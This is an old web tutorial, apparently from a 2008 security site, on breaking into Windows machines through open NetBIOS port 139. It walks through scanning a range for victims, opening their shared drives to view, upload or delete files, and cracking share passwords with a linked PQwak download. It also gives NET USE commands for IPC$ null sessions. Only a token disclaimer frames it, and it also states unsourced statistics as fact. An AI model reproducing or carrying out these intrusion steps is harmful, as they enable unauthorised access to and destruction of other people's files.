Welcome To Security.Fx-Vista.Com

Computer Security Information

Home

NetBIOS Vulnerability

<<< Back

By Rishabh Đara 

 

::What is NetBIOS ?:: NetBIOS (Network Basic Input/Output System) refers to a concept originally  conceived by IBM and Sytek as an Application Programming Interface (API) for client software to access  LAN resources. NetBIOS has since been adopted as an industry standard and now it offers network  applications a chance to fill up the previous communication gaps by carrying out inter-application  communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network.

 

::NetBIOS in Windows:: A computer is open to NetBIOS if that computer has port 139 open. This is the  single most dangerous port on the Internet. All "File and Printer Sharing" on a Windows machine runs  over this port. About 10% of all users on the Internet leave their hard disks exposed on this port. This is  the first port hackers want to connect to, and the port that firewalls block. Port 139 is primarily used by  the SMB browser service that fills the information within the "Network Neighbourhood" icon.

 

::Finding the vulnerable:: For this one needs to scan the network or a range of IP's to see who has port  139 open. For this I recommend you use LAN Scan. Once you have finished scanning a network and have  found vulnerable IP's then you move to the next step.

 

::Exploiting the vulnerability:: Start » Run » \\xxx.xxx.xxx.xxx » OK where xxx.xxx.xxx.xxx is the IP  address of the victim. This will open a window which will show the contents of the victim's hardisk. You may now view, download, upload and delete files and other documents off the victims computer.

 

::Getting past the password box:: If this does not happen and a password box pops up then you need to  download PQwak. It will ask for the IP address and the share name. Share name is like the name of the  folder which is password protected. Leave the rest to PQwak. (Ps. PQwak will not work for the share name  IPC$)

 

::Getting around IPC$ share:: This will explain the "uses" of IPC for hackers. Inter-Process  Communication is used for data sharing between applications and computers. We will be looking at  Windows NT default IPC$ share use for communication between computers. This share is what we use to start to gain access to the server. What we will look at before we start is the NET commands for the  console in NT. (Note I was unable to create a null connection using a 95/98 computer I had to use an NT  computer) The net commands that we will be using are net use and net view. Now get in to the console  (fake ms-dos) in windows. Pick out your target and make sure that it is an NT system with port 139 open.  After checking for that you go to the console and type:

 

Example 1> C:\>NET USE \\TARGET\IPC$ * /USER:

Example 2> C:\>NET USE \\TARGET\IPC$ * /USER:""

Example 3> C:\>NET USE \\TARGET\IPC$ "" /USER:""

 

a.. Note: For some reason the command varies a little bit from NT to NT

b.. Note: TARGET is the name or IP of the computer, ex. \\211.3.4.11\ipc$* /user:

c.. Note: If it works youll get> The command completed successfully.

d.. Note: To check the connection type NET USE \\TARGET\IPC$

 

::Disclaimer:: This tutorial is for educational purposes only and should not be exploited for personal benefit.

 

Hyperlinks:

 

ftp://ftp.languard.com/lannetscan.exe

http://darknet.hack.gr/exploits/os/win/me/pqwak2.zip 

<<< Back

 

Copyright ©2008 www.Security.Fx-Vista.Com | All rights reserved